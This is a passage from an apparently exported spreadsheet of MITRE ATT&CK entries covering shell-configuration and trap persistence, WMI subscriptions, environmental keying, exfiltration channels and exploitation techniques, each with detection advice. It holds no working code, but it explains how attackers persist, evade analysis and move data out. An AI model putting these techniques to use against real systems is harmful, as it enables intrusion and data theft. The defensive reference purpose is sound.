    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>Event Triggered Execution: Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t xml:space="preserve">While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) 
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
</t>
  </si>
  <si>
    <t>Robert Wilson; Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Event Triggered Execution: Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails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guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Nick Carr, FireEye</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Execution Guardrails: Environmental Keying</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alfredo Abarca</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/002</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t xml:space="preserve">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 
Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>12 March 2020</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium: Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/002</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Code Repository</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>Anti-virus, System access controls</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</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</si>
  <si>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or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)
Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>Initial Access, Persistence</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.
When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
